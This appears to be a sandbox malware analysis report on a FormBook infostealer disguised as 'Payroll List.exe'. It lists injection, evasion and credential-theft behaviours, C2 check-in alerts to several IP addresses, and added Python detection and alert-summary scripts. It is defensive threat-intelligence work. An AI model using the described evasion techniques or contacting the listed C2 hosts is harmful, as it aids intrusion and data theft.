
Windows Analysis Report
Payroll List.exe

Overview

General Information

Sample name: Payroll List.exe
Analysis ID: 1560911
MD5: f15d8b7a5271a52273a158ff2f642d12
SHA1: 9a6178bbf1f646d6d29d6b9cfb7cfdd415f6458a
SHA256: 9de22b2b1f7bf1727126b7d85573f62bc9c247075936ced5cf1035bc893d48d7
Tags: exe, user-julianmckein

Detection

FormBook
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Payroll List.exe (PID: 7720 cmdline: "C:\Users\user\Desktop\Payroll List.exe" MD5: F15D8B7A5271A52273A158FF2F642D12)
    • svchost.exe (PID: 7784 cmdline: "C:\Users\user\Desktop\Payroll List.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • eLiCpwzRIeWAs.exe (PID: 5964 cmdline: "C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • srdelayed.exe (PID: 7988 cmdline: "C:\Windows\SysWOW64\srdelayed.exe" MD5: B5F31FDCE1BE4171124B9749F9D2C600)
        • ktmutil.exe (PID: 7996 cmdline: "C:\Windows\SysWOW64\ktmutil.exe" MD5: AC387D5962B2FE2BF4D518DD57BA7230)
          • eLiCpwzRIeWAs.exe (PID: 1240 cmdline: "C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7372 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
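The process tree above carries the host-side evidence of the "Creates a process in suspended mode" / "Modifies the context of a thread in another process" signatures: svchost.exe (PID 7784) runs with the *parent's* command line, two SysWOW64 utilities are started from a random-named directory under Program Files (x86), and ktmutil.exe ends up launching firefox.exe. The following Python is an added example, not part of the Joe Sandbox report, that encodes those observations as detection checks over Sysmon-style process-creation events. The events are constructed from the tree; the parent of PID 7720 (explorer.exe) and the svchost parent allowlist are assumptions made for the example.

```python
"""Detection checks for the process-hollowing pattern in the report's process tree.
Events are constructed from the tree; field names follow Sysmon Event ID 1."""
import ntpath
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str          # Sysmon "Image": path of the new process
    cmdline: str        # Sysmon "CommandLine"
    parent_image: str   # Sysmon "ParentImage"


# Parents that legitimately start svchost.exe. This allowlist is an assumption for
# the example (the kind of exclusion list a Sigma rule carries), not an exhaustive one.
SVCHOST_PARENTS = {"services.exe", "msmpeng.exe", "mrt.exe", "rpcnet.exe", "svchost.exe"}
WINDOWS_DIR = "c:\\windows\\"
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

SAMPLE = r"C:\Users\user\Desktop\Payroll List.exe"
DROPPER = (r"C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV"
           r"\eLiCpwzRIeWAs.exe")

# Constructed from the report's process tree (PIDs, images and command lines as shown).
# explorer.exe as the parent of PID 7720 is an assumption: the tree starts at the sample.
EVENTS = [
    ProcEvent(7720, SAMPLE, f'"{SAMPLE}"', r"C:\Windows\explorer.exe"),
    ProcEvent(7784, r"C:\Windows\SysWOW64\svchost.exe", f'"{SAMPLE}"', SAMPLE),
    ProcEvent(5964, DROPPER, f'"{DROPPER}"', r"C:\Windows\SysWOW64\svchost.exe"),
    ProcEvent(7988, r"C:\Windows\SysWOW64\srdelayed.exe", r'"C:\Windows\SysWOW64\srdelayed.exe"', DROPPER),
    ProcEvent(7996, r"C:\Windows\SysWOW64\ktmutil.exe", r'"C:\Windows\SysWOW64\ktmutil.exe"', DROPPER),
    ProcEvent(1240, DROPPER, f'"{DROPPER}"', r"C:\Windows\SysWOW64\ktmutil.exe"),
    ProcEvent(7372, r"C:\Program Files\Mozilla Firefox\Firefox.exe",
              r'"C:\Program Files\Mozilla Firefox\Firefox.exe"', r"C:\Windows\SysWOW64\ktmutil.exe"),
]


def first_token(cmdline: str) -> str:
    """Executable path named by a command line, honouring a quoted first argument."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end > 0 else s[1:]
    return s.split(" ", 1)[0]


def detect(events) -> dict[int, set[str]]:
    """Map PID -> set of findings for the hollowing-style anomalies in the tree."""
    findings: dict[int, set[str]] = {}
    for ev in events:
        image = ntpath.basename(ev.image).lower()
        parent = ntpath.basename(ev.parent_image).lower()
        hits = set()
        # 1. The command line names a different executable than the mapped image: the
        #    trace left by CreateProcess(CREATE_SUSPENDED) followed by image replacement.
        if ntpath.basename(first_token(ev.cmdline)).lower() != image:
            hits.add("cmdline_image_mismatch")
        if image == "svchost.exe":
            # 2. A real service host descends from services.exe (the Sigma hit in the report).
            if parent not in SVCHOST_PARENTS:
                hits.add("uncommon_svchost_parent")
            # 3. ... and is started with "-k <service group>".
            if " -k " not in ev.cmdline.lower():
                hits.add("svchost_missing_k")
        # 4. A System32/SysWOW64 binary launched by something outside C:\Windows.
        if ev.image.lower().startswith(SYSTEM_DIRS) and not ev.parent_image.lower().startswith(WINDOWS_DIR):
            hits.add("system_binary_nonwindows_parent")
        if hits:
            findings[ev.pid] = hits
    return findings


if __name__ == "__main__":
    for pid, hits in sorted(detect(EVENTS).items()):
        print(pid, ", ".join(sorted(hits)))
```

On the constructed events, PID 7784 trips all four checks and the two SysWOW64 utilities (7988, 7996) trip the non-Windows-parent check; the firefox.exe launch from ktmutil.exe is not covered by these checks and needs a separate "browser started by a non-shell parent" rule.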
Yara matches (memory dumps):

Source | Rule | Description | Author
00000002.00000002.1734177353.0000000003760000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000002.00000002.1733855292.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000006.00000002.3292196090.0000000002900000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000006.00000002.3291497446.0000000000680000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000004.00000002.3292524183.0000000004FB0000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000006.00000002.3291358467.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000007.00000002.3295460520.0000000005260000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000002.00000002.1734536564.0000000005E00000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security

Yara matches (unpacked PE files):

Source | Rule | Description | Author
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
2.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security

                System Summary

Sigma matches:

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Users\user\Desktop\Payroll List.exe", CommandLine: "C:\Users\user\Desktop\Payroll List.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Payroll List.exe", ParentImage: C:\Users\user\Desktop\Payroll List.exe, ParentProcessId: 7720, ParentProcessName: Payroll List.exe, ProcessCommandLine: "C:\Users\user\Desktop\Payroll List.exe", ProcessId: 7784, ProcessName: svchost.exe
Source: Process started; Author: vburov; Data: Command: "C:\Users\user\Desktop\Payroll List.exe", CommandLine: "C:\Users\user\Desktop\Payroll List.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Payroll List.exe", ParentImage: C:\Users\user\Desktop\Payroll List.exe, ParentProcessId: 7720, ParentProcessName: Payroll List.exe, ProcessCommandLine: "C:\Users\user\Desktop\Payroll List.exe", ProcessId: 7784, ProcessName: svchost.exe
Suricata alerts, SID 2050745 (ET MALWARE FormBook CnC Checkin (GET) M5), severity 1, classtype "Malware Command and Control Activity Detected", TCP:

Timestamp | Source IP:port | Destination IP:port
2024-11-22T14:44:49.867696+0100 | 192.168.2.8:49707 | 154.216.76.80:80
2024-11-22T14:45:15.054578+0100 | 192.168.2.8:49712 | 3.33.130.190:80
2024-11-22T14:45:30.073486+0100 | 192.168.2.8:49716 | 203.161.49.193:80
2024-11-22T14:45:44.801631+0100 | 192.168.2.8:49720 | 3.33.130.190:80
2024-11-22T14:45:59.907703+0100 | 192.168.2.8:49724 | 3.33.130.190:80
2024-11-22T14:46:14.898190+0100 | 192.168.2.8:49728 | 198.252.98.54:80
2024-11-22T14:46:30.465806+0100 | 192.168.2.8:49732 | 103.224.182.242:80
2024-11-22T14:46:46.133779+0100 | 192.168.2.8:49736 | 154.23.184.218:80
2024-11-22T14:47:01.304688+0100 | 192.168.2.8:49740 | 31.31.196.17:80

Suricata alerts, SID 2855465 (ETPRO MALWARE FormBook CnC Checkin (GET) M2), severity 1, classtype "A Network Trojan was detected", TCP (same nine flows as above):

Timestamp | Source IP:port | Destination IP:port
2024-11-22T14:44:49.867696+0100 | 192.168.2.8:49707 | 154.216.76.80:80
2024-11-22T14:45:15.054578+0100 | 192.168.2.8:49712 | 3.33.130.190:80
2024-11-22T14:45:30.073486+0100 | 192.168.2.8:49716 | 203.161.49.193:80
2024-11-22T14:45:44.801631+0100 | 192.168.2.8:49720 | 3.33.130.190:80
2024-11-22T14:45:59.907703+0100 | 192.168.2.8:49724 | 3.33.130.190:80
2024-11-22T14:46:14.898190+0100 | 192.168.2.8:49728 | 198.252.98.54:80
2024-11-22T14:46:30.465806+0100 | 192.168.2.8:49732 | 103.224.182.242:80
2024-11-22T14:46:46.133779+0100 | 192.168.2.8:49736 | 154.23.184.218:80
2024-11-22T14:47:01.304688+0100 | 192.168.2.8:49740 | 31.31.196.17:80

Suricata alerts, SID 2855464 (ETPRO MALWARE FormBook CnC Checkin (POST) M3), severity 1, classtype "A Network Trojan was detected", TCP:

Timestamp | Source IP:port | Destination IP:port
2024-11-22T14:45:07.003448+0100 | 192.168.2.8:49709 | 3.33.130.190:80
2024-11-22T14:45:09.629527+0100 | 192.168.2.8:49710 | 3.33.130.190:80
2024-11-22T14:45:12.273605+0100 | 192.168.2.8:49711 | 3.33.130.190:80
2024-11-22T14:45:21.988359+0100 | 192.168.2.8:49713 | 203.161.49.193:80
2024-11-22T14:45:24.696464+0100 | 192.168.2.8:49714 | 203.161.49.193:80
2024-11-22T14:45:27.401707+0100 | 192.168.2.8:49715 | 203.161.49.193:80
2024-11-22T14:45:36.965532+0100 | 192.168.2.8:49717 | 3.33.130.190:80
2024-11-22T14:45:39.557692+0100 | 192.168.2.8:49718 | 3.33.130.190:80
2024-11-22T14:45:42.145120+0100 | 192.168.2.8:49719 | 3.33.130.190:80
2024-11-22T14:45:51.749224+0100 | 192.168.2.8:49721 | 3.33.130.190:80
2024-11-22T14:45:54.510679+0100 | 192.168.2.8:49722 | 3.33.130.190:80
2024-11-22T14:45:57.209645+0100 | 192.168.2.8:49723 | 3.33.130.190:80
2024-11-22T14:46:06.938463+0100 | 192.168.2.8:49725 | 198.252.98.54:80
2024-11-22T14:46:09.548475+0100 | 192.168.2.8:49726 | 198.252.98.54:80
2024-11-22T14:46:12.157215+0100 | 192.168.2.8:49727 | 198.252.98.54:80
2024-11-22T14:46:22.583498+0100 | 192.168.2.8:49729 | 103.224.182.242:80
2024-11-22T14:46:25.163977+0100 | 192.168.2.8:49730 | 103.224.182.242:80
2024-11-22T14:46:27.865598+0100 | 192.168.2.8:49731 | 103.224.182.242:80
2024-11-22T14:46:38.032785+0100 | 192.168.2.8:49733 | 154.23.184.218:80
2024-11-22T14:46:40.704853+0100 | 192.168.2.8:49734 | 154.23.184.218:80
2024-11-22T14:46:43.360922+0100 | 192.168.2.8:49735 | 154.23.184.218:80
2024-11-22T14:46:53.207473+0100 | 192.168.2.8:49737 | 31.31.196.17:80
2024-11-22T14:46:55.800508+0100 | 192.168.2.8:49738 | 31.31.196.17:80
2024-11-22T14:46:58.697237+0100 | 192.168.2.8:49739 | 31.31.196.17:80
2024-11-22T14:47:08.567712+0100 | 192.168.2.8:49741 | 64.190.63.222:80
2024-11-22T14:47:11.826466+0100 | 192.168.2.8:49742 | 64.190.63.222:80
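Read as a whole, the three alert tables above show FormBook's check-in rotation: the sample walks through a list of hosts, and an ET rule and an ETPRO rule both fire on every GET, so counting raw alerts overstates the GET check-ins. The following Python is an added example, not part of the Joe Sandbox report, that collapses the alerts to one record per flow and summarises which hosts were contacted, in what order, with how many GET and POST check-ins, and at what cadence. The rows are copied from the tables; the SID-to-method mapping is taken from the rule names the report's Networking section gives for each SID (2050745 and 2855465 are GET check-ins, 2855464 a POST check-in).

```python
"""Summarise the report's Suricata alerts as FormBook's C2 rotation.
Rows are copied from the report's alert tables (2024-11-22, 192.168.2.8 -> dst:80)."""
from collections import OrderedDict
from datetime import datetime
from statistics import median

GET_SIDS = {2050745, 2855465}   # "FormBook CnC Checkin (GET)" M5 (ET) and M2 (ETPRO)
POST_SIDS = {2855464}           # "FormBook CnC Checkin (POST)" M3 (ETPRO)

# (time, source port, destination IP) from the SID 2050745 table; the SID 2855465
# table lists exactly the same nine flows.
GET_ROWS = [
    ("14:44:49.867696", 49707, "154.216.76.80"), ("14:45:15.054578", 49712, "3.33.130.190"),
    ("14:45:30.073486", 49716, "203.161.49.193"), ("14:45:44.801631", 49720, "3.33.130.190"),
    ("14:45:59.907703", 49724, "3.33.130.190"), ("14:46:14.898190", 49728, "198.252.98.54"),
    ("14:46:30.465806", 49732, "103.224.182.242"), ("14:46:46.133779", 49736, "154.23.184.218"),
    ("14:47:01.304688", 49740, "31.31.196.17"),
]
# (time, source port, destination IP) from the SID 2855464 table.
POST_ROWS = [
    ("14:45:07.003448", 49709, "3.33.130.190"), ("14:45:09.629527", 49710, "3.33.130.190"),
    ("14:45:12.273605", 49711, "3.33.130.190"), ("14:45:21.988359", 49713, "203.161.49.193"),
    ("14:45:24.696464", 49714, "203.161.49.193"), ("14:45:27.401707", 49715, "203.161.49.193"),
    ("14:45:36.965532", 49717, "3.33.130.190"), ("14:45:39.557692", 49718, "3.33.130.190"),
    ("14:45:42.145120", 49719, "3.33.130.190"), ("14:45:51.749224", 49721, "3.33.130.190"),
    ("14:45:54.510679", 49722, "3.33.130.190"), ("14:45:57.209645", 49723, "3.33.130.190"),
    ("14:46:06.938463", 49725, "198.252.98.54"), ("14:46:09.548475", 49726, "198.252.98.54"),
    ("14:46:12.157215", 49727, "198.252.98.54"), ("14:46:22.583498", 49729, "103.224.182.242"),
    ("14:46:25.163977", 49730, "103.224.182.242"), ("14:46:27.865598", 49731, "103.224.182.242"),
    ("14:46:38.032785", 49733, "154.23.184.218"), ("14:46:40.704853", 49734, "154.23.184.218"),
    ("14:46:43.360922", 49735, "154.23.184.218"), ("14:46:53.207473", 49737, "31.31.196.17"),
    ("14:46:55.800508", 49738, "31.31.196.17"), ("14:46:58.697237", 49739, "31.31.196.17"),
    ("14:47:08.567712", 49741, "64.190.63.222"), ("14:47:11.826466", 49742, "64.190.63.222"),
]
# Raw alert list as Suricata emitted it: (time, sid, source port, destination IP).
ALERTS = ([(t, 2050745, p, d) for t, p, d in GET_ROWS]
          + [(t, 2855465, p, d) for t, p, d in GET_ROWS]
          + [(t, 2855464, p, d) for t, p, d in POST_ROWS])


def parse_ts(t: str) -> datetime:
    return datetime.strptime("2024-11-22T" + t, "%Y-%m-%dT%H:%M:%S.%f")


def flows(alerts):
    """One (time, dst, method) record per flow keyed on (src port, dst), so the ET and
    ETPRO rules that both fire on a GET are counted once."""
    seen = {}
    for t, sid, sport, dst in alerts:
        method = "GET" if sid in GET_SIDS else "POST" if sid in POST_SIDS else "OTHER"
        seen.setdefault((sport, dst), (parse_ts(t), dst, method))
    return sorted(seen.values())


def rotation(alerts):
    """Destinations in order of first contact, with per-method check-in counts."""
    hosts = OrderedDict()
    for ts, dst, method in flows(alerts):
        entry = hosts.setdefault(dst, {"first_seen": ts, "GET": 0, "POST": 0, "OTHER": 0})
        entry[method] += 1
    return hosts


def get_interval(alerts):
    """Median seconds between successive GET check-ins, across all hosts."""
    gets = [ts for ts, _, m in flows(alerts) if m == "GET"]
    return median((b - a).total_seconds() for a, b in zip(gets, gets[1:]))


if __name__ == "__main__":
    for dst, e in rotation(ALERTS).items():
        print(f"{e['first_seen']:%H:%M:%S}  {dst:16} GET={e['GET']} POST={e['POST']}")
    print(f"median GET interval: {get_interval(ALERTS):.1f} s")
```

On the report's rows this yields eight destinations in order of first contact: 3.33.130.190 receives 3 GET and 9 POST check-ins, 154.216.76.80 a single GET, 64.190.63.222 only two POSTs before the capture ends, and successive GET check-ins are about 15 seconds apart. The 44 raw alerts collapse to 35 flows; the per-host table, not the alert count, is what belongs in a block list or a hunt query.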


                AV Detection

Source: Payroll List.exe; ReversingLabs: Detection: 57%
Source: Yara match; File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000002.00000002.1734177353.0000000003760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.1733855292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.3292196090.0000000002900000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.3291497446.0000000000680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.3292524183.0000000004FB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.3291358467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.3295460520.0000000005260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.1734536564.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: Payroll List.exe; Joe Sandbox ML: detected
Source: Payroll List.exe; Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: eLiCpwzRIeWAs.exe, 00000004.00000000.1656145013.000000000061E000.00000002.00000001.01000000.00000005.sdmp, eLiCpwzRIeWAs.exe, 00000007.00000002.3291434953.000000000061E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: Payroll List.exe, 00000000.00000003.1434270538.0000000003770000.00000004.00001000.00020000.00000000.sdmp, Payroll List.exe, 00000000.00000003.1427600863.00000000035D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639800247.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1734208595.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1734208595.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641453907.0000000003700000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000003.1744250358.0000000002BF6000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000002.3292514897.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000002.3292514897.0000000002F3E000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000003.1742406359.0000000002A44000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Payroll List.exe, 00000000.00000003.1434270538.0000000003770000.00000004.00001000.00020000.00000000.sdmp, Payroll List.exe, 00000000.00000003.1427600863.00000000035D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1639800247.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1734208595.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1734208595.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641453907.0000000003700000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, ktmutil.exe, 00000006.00000003.1744250358.0000000002BF6000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000002.3292514897.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000002.3292514897.0000000002F3E000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000003.1742406359.0000000002A44000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: ktmutil.pdbGCTL source: svchost.exe, 00000002.00000002.1734052024.0000000003219000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1734033314.0000000003200000.00000004.00000020.00020000.00000000.sdmp, eLiCpwzRIeWAs.exe, 00000004.00000002.3292022741.0000000001548000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: ktmutil.pdb source: svchost.exe, 00000002.00000002.1734052024.0000000003219000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1734033314.0000000003200000.00000004.00000020.00020000.00000000.sdmp, eLiCpwzRIeWAs.exe, 00000004.00000002.3292022741.0000000001548000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: ktmutil.exe, 00000006.00000002.3291580399.0000000002813000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000002.3293451407.00000000033CC000.00000004.10000000.00040000.00000000.sdmp, eLiCpwzRIeWAs.exe, 00000007.00000002.3292809726.0000000002E2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2045258675.00000000258CC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: ktmutil.exe, 00000006.00000002.3291580399.0000000002813000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000002.3293451407.00000000033CC000.00000004.10000000.00040000.00000000.sdmp, eLiCpwzRIeWAs.exe, 00000007.00000002.3292809726.0000000002E2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2045258675.00000000258CC000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\Payroll List.exe; Code function: 0_2_00166CA9 GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\Payroll List.exe; Code function: 0_2_001660DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\Payroll List.exe; Code function: 0_2_001663F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\Payroll List.exe; Code function: 0_2_0016EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\Payroll List.exe; Code function: 0_2_0016F56F FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\Payroll List.exe; Code function: 0_2_0016F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\Desktop\Payroll List.exe; Code function: 0_2_00171B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\Payroll List.exe; Code function: 0_2_00171C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\Payroll List.exe; Code function: 0_2_00171F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\ktmutil.exe; Code function: 6_2_0041C810 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\ktmutil.exe; Code function: 6_2_00409F20: 4x nop then xor eax, eax
Source: C:\Windows\SysWOW64\ktmutil.exe; Code function: 6_2_0040E50B: 4x nop then pop edi
Source: C:\Windows\SysWOW64\ktmutil.exe; Code function: 6_2_02A404DF: 4x nop then mov ebx, 00000004h

                Networking

Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49709 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49712 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49712 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49718 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49711 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49707 -> 154.216.76.80:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49707 -> 154.216.76.80:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49720 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49720 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49717 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49710 -> 3.33.130.190:80
